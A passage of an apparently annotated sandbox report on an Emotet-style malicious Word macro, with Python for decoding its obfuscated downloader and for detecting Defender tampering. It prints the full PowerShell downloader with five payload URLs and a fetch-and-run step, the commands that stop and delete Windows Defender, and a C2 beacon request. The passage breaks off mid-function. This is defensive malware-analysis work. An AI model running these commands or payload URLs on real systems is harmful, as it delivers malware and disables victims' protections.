Spawned process "cmd.exe" with commandline "/c sc stop WinDefend"
Spawned process "cmd.exe" with commandline "/c sc delete WinDefend"
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
Spawned process "sc.exe" with commandline "sc delete WinDefend"
Spawned process "sc.exe" with commandline "sc stop WinDefend"
Spawned process "svchost.exe"
Spawned process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true"
- source: Monitored Target
- relevance: 8/10
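The "-e" argument above is the base64 encoding of a UTF-16LE PowerShell script, and the script hides its download list behind chains of concatenated single-quoted fragments ('htt'+'p:'+'//52'+...) joined by '@' and split at run time. The following is an added example written for this page, not code from the report or from the malware: a decoder that reverses the encoding, collapses the fragment chains and pulls out the URL list and the minimum-size gate. Rather than embedding the full blob, the sample script is constructed here to mirror that obfuscation, reusing only the two payload URLs this report confirms in its network section (35.184.61.254/tg9pzdY and 52.204.186.102/PASmkvmb), the 46.exe drop name and the 40000-byte check; the real blob can be passed to decode_command as-is.

```python
"""Decode a `powershell -e` blob and recover the download URLs from an
Emotet-style string-concatenation downloader."""
import base64
import re

# Constructed sample modelled on the obfuscated downloader in this report:
# same ('a'+'b') fragment chains, '@'-separated URL list, size gate and drop
# name, but only the two URLs the report's network section confirms.
SAMPLE_SCRIPT = (
    "$W3_5463_=('h86_'+'0242');"
    "$G6__1179=new-object Net.WebClient;"
    "$c_0_5___=('http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'"
    "+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb').Split('@');"
    "$m4__5_20 = '46';"
    "$J06_684_=$env:userprofile+'\\'+$m4__5_20+('.e'+'xe');"
    "foreach($U_86169 in $c_0_5___){try{"
    "$G6__1179.DownloadFile($U_86169, $J06_684_);"
    "If ((Get-Item $J06_684_).length -ge 40000) {Invoke-Item $J06_684_;break;}"
    "}catch{}}"
)


def encode_command(script):
    """Produce what `powershell -e` consumes: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse `-e`: base64 -> UTF-16LE text. Tolerates stripped '=' padding."""
    blob = blob.strip()
    return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le")


# 'abc'+'def'  ->  'abcdef'   (single-quoted PowerShell literals only)
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def join_fragments(script):
    """Collapse chains of concatenated literals until nothing changes."""
    previous = None
    while previous != script:
        previous = script
        script = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def extract_urls(script):
    """Return the URL list the downloader iterates over, in order."""
    urls = []
    for literal in re.findall(r"'([^']*)'", join_fragments(script)):
        urls.extend(u for u in literal.split("@") if u.lower().startswith("http"))
    return urls


def size_gate(script):
    """The minimum download size the loader insists on before running it."""
    m = re.search(r"\.length\s+-ge\s+(\d+)", script)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    decoded = decode_command(encode_command(SAMPLE_SCRIPT))
    for url in extract_urls(decoded):
        print("payload URL:", url)
    print("size gate:", size_gate(decoded))
```

The size gate matters for triage: the loader only executes a download larger than the threshold, so a payload server that answers with a small error page is skipped and the next URL in the list is tried, which is why all of the listed hosts, not only the first, belong on the block list.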
Hiding 12 Malicious Indicators (available only in the private webservice or standalone version)

Suspicious Indicators (17)

Environment Awareness
Contains ability to measure performance
- details:
rdtsc from 46.exe (PID: 2412)
rdtsc from 46.exe (PID: 3644)
rdtsc from limewcs.exe (PID: 3664)
rdtsc from limewcs.exe (PID: 1916)
rdtsc
- source: Hybrid Analysis Technology
- relevance: 10/10
rdtsc is the usual instruction behind timing-based VM and sandbox checks, which is why it is filed under environment awareness, but it also appears in ordinary high-resolution timing code, so treat it as supporting evidence only.

General

Opened the service control manager
- details:
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"powershell.exe" called "OpenSCManager" requesting access rights "0X0"
"powershell.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"46.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ALL_ACCESS" (0xf003f)
"limewcs.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
"limewcs.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ALL_ACCESS" (0xf003f)
"ZOhPSkmvRrgs3fH129U.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
"sc.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"ZPhQTlnvSsgt3fI129V.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
"svchost.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1035

POSTs files to a webserver
- details:
"POST /del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 190.146.112.216:8082
Content-Length: 154
Cache-Control: no-cache" with no payload
- source: Network Traffic
- relevance: 5/10
The request path encodes the sandbox hostname (HAPUBWS-PC), the OS build string W617601 (Windows 6.1 build 7601, matching the guest system) and a 32-hex-digit client identifier, the same scheme as the /sat1/, /lib417/, /lib420/ and /sin12/ URLs recorded for 190.146.112.216 above (only the first path element and the trailing number differ), so this is a check-in beacon rather than a file upload. The sandbox reports "no payload" although Content-Length is 154, so the multipart body was not captured. A multipart POST to a non-standard port with the literal User-Agent "test" and boundary "Arasfjasu7" is a tight network signature.

Installation/Persistence
Allocates virtual memory in a remote process
- details: "powershell.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" (the target the sandbox names is a registry key path, not a process, so this entry is a misattributed API hook and not evidence of injection by powershell.exe)
- source: API Call
- relevance: 7/10
- ATT&CK ID: T1055

Drops executable files
- details:
"ZPhQTlnvSsgt3fI129V.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"46.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"ZOhPSkmvRrgs3fH129U.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source: Binary File
- relevance: 10/10

Network Related

Found potential IP address in binary/memory
- details:
"35.184.61.254"
Heuristic match: "GET /tg9pzdY HTTP/1.1
Host: 35.184.61.254
Connection: Keep-Alive"
Heuristic match: "GET /tg9pzdY/ HTTP/1.1
Host: 35.184.61.254"
"52.204.186.102"
Heuristic match: "GET /PASmkvmb HTTP/1.1
Host: 52.204.186.102
Connection: Keep-Alive"
Heuristic match: "GET /PASmkvmb/ HTTP/1.1
Host: 52.204.186.102"
"74.59.106.11"
"190.146.112.216"
Heuristic match: "162.12.124.64.cbl.abuseat.org"
Heuristic match: "162.12.124.64.zen.spamhaus.org"
- source: File/Memory
- relevance: 3/10
The last two heuristic matches are reverse-octet DNSBL queries: the sample asked Spamhaus ZEN and the abuseat CBL whether the sandbox's egress address, 64.124.12.162, is listed, a check a spam-sending module makes before it starts mailing directly.

Sends traffic on typical HTTP outbound port, but without HTTP header
- details:
TCP traffic to 35.184.61.254 on port 80 is sent without HTTP header
TCP traffic to 52.204.186.102 on port 80 is sent without HTTP header
TCP traffic to 74.59.106.11 on port 8080 is sent without HTTP header
TCP traffic to 216.239.32.21 on port 80 is sent without HTTP header
TCP traffic to 107.22.215.20 on port 80 is sent without HTTP header
TCP traffic to 195.123.245.16 on port 443 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10

Uses a User Agent typical for browsers, although no browser was ever launched
- details: Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source: Network Traffic
- relevance: 10/10

Remote Access Related
Contains a remote desktop related string
- details:
"evnctjvlctj=dkfhaz jr" (Indicator for product: Generic VNC)
"vnchusibdz=izgehffd z isq zx" (Indicator for product: Generic VNC)
"omnlmwk=g ntae o tlz ayzc ruokfem bido qlu kxm nevnc ti zr" (Indicator for product: Generic VNC)
- source: File/Memory
- relevance: 10/10
Each match is the substring "vnc" inside random-looking filler text, so this is most likely a false positive of the string heuristic rather than evidence of a VNC component; the "Remote Access" entry in the risk assessment above rests on these three strings alone.

System Security

Modifies proxy settings
- details:
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"limewcs.exe" (Access type: "SETVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"limewcs.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"limewcs.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"ZOhPSkmvRrgs3fH129U.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"ZOhPSkmvRrgs3fH129U.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"ZPhQTlnvSsgt3fI129V.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"ZPhQTlnvSsgt3fI129V.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112
The ZoneMap\ProxyBypass deletions by powershell.exe and by the two droppers are the kind of entry WinINet rewrites when it is initialised and are weak evidence on their own. The change that matters is limewcs.exe setting ProxyEnable to 0 and deleting ProxyServer and ProxyOverride, which forces its traffic to bypass any user-configured proxy.

Unusual Characteristics

Contains ability to flush the cache line
- details: clflush byte ptr [FFFFFFFFC59DF8FFh] from powershell.exe (PID: 3304)
- source: Hybrid Analysis Technology
- relevance: 10/10
Contains embedded VBA macros with suspicious keywords
- details:
Found suspicious keyword "ChrB" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
Found suspicious keyword "ShowWindow" which indicates: "May hide the application"
- source: Static Parser
- relevance: 10/10

Executes powershell accessing native variables
- details:
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Indicator: "$true", UID: 00019430-00002160)
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Indicator: "$true", UID: 00020019-00003640)
- source: Monitored Target
- relevance: 10/10
- ATT&CK ID: T1086

Invokes a process with a very long commandline
- details: "poweRsHeLl -nop -e …" on 2019-2-25.20:33:40.108 (the encoded command is the one shown in full under "Spawns a lot of processes")
- source: Monitored Target
- relevance: 10/10

Hiding 3 Suspicious Indicators (available only in the private webservice or standalone version)

Informative (22)

Anti-Reverse Engineering
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details:
SetUnhandledExceptionFilter@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992)
SetUnhandledExceptionFilter@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992)
- source: Hybrid Analysis Technology
- relevance: 1/10
SetUnhandledExceptionFilter (and GetSystemTimeAsFileTime below) are called by the MSVC C runtime start-up code of every release build, so on their own they are not anti-analysis signals; the 1/10 relevance reflects that.

Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details: "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source: API Call
- relevance: 10/10
Windows and the .NET runtime both use PAGE_GUARD for thread-stack guard pages, so in powershell.exe this is expected behaviour rather than an anti-dumping trick.

Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
- details:
Found reference to API SetProcessDEPPolicy@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
Found reference to API SetProcessDEPPolicy@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
Found reference to API SetProcessDEPPolicy@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992)
- source: Hybrid Analysis Technology
- relevance: 10/10

Environment Awareness

Contains ability to query machine time
- details:
GetSystemTimeAsFileTime@KERNEL32.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
GetSystemTimeAsFileTime@KERNEL32.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992) - source
- Hybrid Analysis Technology
- relevance
- 1/10
- ATT&CK ID
- T1124
-
Contains ability to query machine time
-
General
-
Contacts domains
- details
-
"ipinfo.io"
"api.ipify.org"
"162.12.124.64.cbl.abuseat.org"
"162.12.124.64.zen.spamhaus.org" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"powershell.pdb"
"iwJL##$@#*$^#%@!^$.pdb"
"D:\18.2.2019\HJnbFdsq\Release\HJnbFdsq.pdb" - source
- File/Memory
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "W0_8___8.cls" (Streampath: "VBA/W0_8___8") has code: ""
File "I922__.bas" (Streampath: "VBA/I922__") has code: "[obfuscated VBA macro dump omitted]" - source
- Static Parser
- relevance
- 10/10
-
Creates mutants
- details
- source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_c_message_859897272.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at E5970000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Loads the .NET runtime environment
- details
-
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E4090000
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\199dd46435d7fdbbe590cccd8c8ae9cb\mscorlib.ni.dll" at 70DB0000
"powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\199dd46435d7fdbbe590cccd8c8ae9cb\mscorlib.ni.dll" at 70DD0000 - source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "powershell.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, Path, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "powershell.exe" (Show Process) was launched with missing environment variables: "MEOW, PROCESSOR_ARCHITEW6432, PROMPT, VXDIR"
Process "46.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "46.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "46.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "limewcs.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, PSModulePath, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles"
Process "limewcs.exe" (Show Process) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, HOMEPATH, HOMEDRIVE"
Process "limewcs.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "limewcs.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "sc.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "ZPhQTlnvSsgt3fI129V.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "sc.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "svchost.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "powershell.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G"" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "-W+")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "=Y+")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "HU+")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Runs shell commands
- details
-
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:40:43.969
"/c sc stop WinDefend" on 2019-2-25.20:40:46.133
"/c sc delete WinDefend" on 2019-2-25.20:40:46.148
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:40:46.187
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:41:28.633
"/c sc stop WinDefend" on 2019-2-25.20:41:30.703
"/c sc delete WinDefend" on 2019-2-25.20:41:30.719
"/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" on 2019-2-25.20:41:30.773 - source
- Monitored Target
- relevance
- 5/10
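The eight commands above are two runs of the same three-step sequence (turn off real-time monitoring with Set-MpPreference, stop the WinDefend service, delete it), each run completing in about 2.2 seconds, the two runs roughly 45 seconds apart; the process list further down shows each of the two dropped executables driving one run through cmd.exe. All three steps need administrative rights and fail otherwise, but the attempts are logged either way, so they are worth alerting on regardless of outcome (current ATT&CK ID T1562.001, Disable or Modify Tools; the report uses the 2019 technique numbering). The Python below is an added example, not code from the report: it applies the rules a detection engineer would derive from those command lines to constructed process-creation events (timestamps and command lines taken from the first run above, plus two benign look-alikes that must stay quiet) and correlates the three steps into one finding. The `sc config WinDefend start= disabled` rule covers a variant the report does not show, and the event layout is my own, not Sysmon's or the Security log's schema.

```python
"""Flag the Defender-tampering command lines from the report in process-creation telemetry.

Added example, not code from the report. The event layout is constructed for the example
and is not Sysmon's or the Windows Security log's schema.
"""
import re
from datetime import datetime, timedelta

# Constructed events: the first run of the sequence, with the report's timestamps and
# command lines, plus two benign look-alikes that must not fire.
EVENTS = [
    ("2019-02-25 20:40:43.969", "cmd.exe", "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("2019-02-25 20:40:46.133", "cmd.exe", "/c sc stop WinDefend"),
    ("2019-02-25 20:40:46.148", "cmd.exe", "/c sc delete WinDefend"),
    ("2019-02-25 20:40:46.187", "cmd.exe", "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("2019-02-25 20:40:50.000", "cmd.exe", "/c sc query WinDefend"),
    ("2019-02-25 20:41:00.000", "powershell.exe", "Get-MpPreference | Select DisableRealtimeMonitoring"),
]

# One rule per observed command shape; the last covers a variant the report does not show.
RULES = [
    ("defender_realtime_off", re.compile(r"Set-MpPreference\b.*-Disable\w*\s+(\$true|1)\b", re.I)),
    ("windefend_service_stop", re.compile(r"\bsc(?:\.exe)?\s+stop\s+WinDefend\b", re.I)),
    ("windefend_service_delete", re.compile(r"\bsc(?:\.exe)?\s+delete\s+WinDefend\b", re.I)),
    ("windefend_service_disabled", re.compile(r"\bsc(?:\.exe)?\s+config\s+WinDefend\b.*\bstart=\s*disabled\b", re.I)),
]
# The three steps the sandbox saw, in any order, inside one time window.
SEQUENCE = {"defender_realtime_off", "windefend_service_stop", "windefend_service_delete"}


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events, window=timedelta(seconds=30)):
    """Per-event hits, plus one correlated finding when all three steps of the observed
    sequence occur inside `window` (they were 2.2 s apart in the sandbox)."""
    hits = []
    for ts, image, cmdline in events:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")
        for rule in match_rules(cmdline):
            hits.append({"time": when, "image": image, "rule": rule, "cmdline": cmdline})
    sequence = None
    for i, first in enumerate(hits):            # hits are chronological, so scan forward
        span = [h for h in hits[i:] if h["time"] - first["time"] <= window]
        if SEQUENCE <= {h["rule"] for h in span}:
            sequence = {"technique": "T1562.001", "start": first["time"], "end": span[-1]["time"]}
            break
    return {"hits": hits, "sequence": sequence}


if __name__ == "__main__":
    result = scan(EVENTS)
    for hit in result["hits"]:
        print(hit["time"].time(), hit["image"], hit["rule"], "<-", hit["cmdline"])
    print("correlated:", result["sequence"])
```

The per-event rules are what you would load into a SIEM; the correlation step is what turns four medium-severity hits into one high-confidence "Defender disabled" alert, and the 30-second window is generous on purpose, since the sandbox saw the whole sequence inside three seconds.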
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "powershell.exe" with commandline "poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnA ..." (UID: 00010119-00003304, Additional Context: "$W3_5463_=('h86_'+'0242');$G6__1179=new-object Net.WebClient;$c_0_5___=('http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'+'ibEUU@http'+'://2'+'22.106'+'.2'+'1'+'7.3'+'7/'+'wo'+'r'+'dpres'+'s/3I'+'1e5'+'Jx').Split('@');$E__1867=('c_'+'__47');$m4__5_20 = '46';$h15574=('q4'+'440_');$J06_684_=$env:userprofile+'\'+$m4__5_20+('.e'+'xe');foreach($U_86169 in $c_0_5___){try{$G6__1179.DownloadFile($U_86169, $J06_684_);$l85___=('h'+'__'+'_03');If ((Get-Item $J06_684_).length -ge 40000) {Invoke-Item $J06_684_;$I3742_8=('L93'+'_'+'1__5');break;}}catch{}}$w_33_34=('Q20'+'0101');")
Spawned process "46.exe" (Show Process)
Spawned process "46.exe" (Show Process)
Spawned process "limewcs.exe" (Show Process)
Spawned process "limewcs.exe" (Show Process)
Spawned process "ZOhPSkmvRrgs3fH129U.exe" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc stop WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc delete WinDefend" (Show Process)
Spawned process "sc.exe" with commandline "sc stop WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "ZPhQTlnvSsgt3fI129V.exe" (Show Process)
Spawned process "sc.exe" with commandline "sc delete WinDefend" (Show Process)
Spawned process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc stop WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc delete WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "sc.exe" with commandline "sc delete WinDefend" (Show Process)
Spawned process "sc.exe" with commandline "sc stop WinDefend" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
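The stage-1 command in the "Additional Context" above is the whole downloader: a list of five URLs assembled from string fragments and split on '@', each tried in turn with WebClient.DownloadFile, the first response of at least 40000 bytes written to %USERPROFILE%\46.exe and run with Invoke-Item (the two URLs the sandbox actually fetched are the first two, which is what the HTTP traffic section shows). The macro dump at the top of the report builds the base64 -e argument the same way, out of double-quoted fragments. The Python below is an added example, not code from the report or the sample: it folds the literal chains in either syntax, recovers the URL list, the drop path and the size check, and decodes the truncated -e prefix as far as base64 alignment allows. Every input string is copied from the report; the function and variable names are mine, and values produced by the macro's junk functions (the other operands of the H4__0_0 call) are not resolved.

```python
"""Recover the stage-1 PowerShell downloader's URL list and drop path from the report's strings.

Added example, not code from the report or the sample. It resolves only literal string
chains ('a'+'b' in PowerShell, "a" + "b" in VBA), $env:NAME and variables assigned a
plain literal; anything computed by the macro's junk functions is left alone.
"""
import base64
import re

# --- Inputs copied verbatim from the report -----------------------------------------
# The -e argument as the report prints it (truncated). PowerShell expects base64 of UTF-16LE.
ENCODED_PREFIX = "JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnA"
# The macro line that builds the last chunk of that blob from double-quoted pieces.
VBA_TAIL = 'k__4252_ = "QA" + "yADA" + "AJwA" + "rACcAMAAxADAAMQ" + "AnACkAO" + "wA="'
# The decoded command the sandbox attached as "Additional Context".
STAGE1 = (
    "$W3_5463_=('h86_'+'0242');$G6__1179=new-object Net.WebClient;"
    "$c_0_5___=('http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'"
    "+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'"
    "+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'"
    "+'ibEUU@http'+'://2'+'22.106'+'.2'+'1'+'7.3'+'7/'+'wo'+'r'+'dpres'+'s/3I'+'1e5'+'Jx').Split('@');"
    "$E__1867=('c_'+'__47');$m4__5_20 = '46';$h15574=('q4'+'440_');"
    "$J06_684_=$env:userprofile+'\\'+$m4__5_20+('.e'+'xe');"
    "foreach($U_86169 in $c_0_5___){try{$G6__1179.DownloadFile($U_86169, $J06_684_);"
    "$l85___=('h'+'__'+'_03');If ((Get-Item $J06_684_).length -ge 40000) {Invoke-Item $J06_684_;"
    "$I3742_8=('L93'+'_'+'1__5');break;}}catch{}}$w_33_34=('Q20'+'0101');"
)

URL = re.compile(r"https?://[^\s'\"@]+")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*'([^']*)'")      # $name = 'literal'


def decode_encoded_arg(b64):
    """Decode a (possibly truncated) -e/-EncodedCommand argument: keep whole base64
    quads and whole UTF-16LE code units, drop the partial tail."""
    raw = base64.b64decode(b64[: len(b64) // 4 * 4])
    return raw[: len(raw) // 2 * 2].decode("utf-16-le")


def collapse_concat(text, q="'"):
    """Fold chains of q-quoted literals joined by '+' (optionally inside one pair of
    parentheses) into a single literal, repeating until nothing changes."""
    lit = f"{q}[^{q}]*{q}"
    chain = re.compile(rf"(\()?({lit}(?:\s*\+\s*{lit})+)(?(1)\))")
    piece = re.compile(f"{q}([^{q}]*){q}")

    def join(m):
        return q + "".join(piece.findall(m.group(2))) + q

    prev = None
    while prev != text:
        prev, text = text, chain.sub(join, text)
    return text


def resolve_drop_path(clean):
    """Follow DownloadFile(<url>, <path>) back to the path expression and evaluate it with
    the script's own literal assignments; $env:NAME is rendered as %NAME%."""
    literals = dict(ASSIGN.findall(clean))
    target = re.search(r"DownloadFile\(\$\w+,\s*(\$\w+)\)", clean).group(1)
    expr = re.search(re.escape(target) + r"\s*=\s*([^;]+);", clean).group(1)
    parts = []
    for term in (t.strip() for t in expr.split("+")):
        if term.startswith("'"):
            parts.append(term.strip("'"))
        elif term.startswith("$env:"):
            parts.append("%" + term[len("$env:"):] + "%")
        else:
            parts.append(literals[term])
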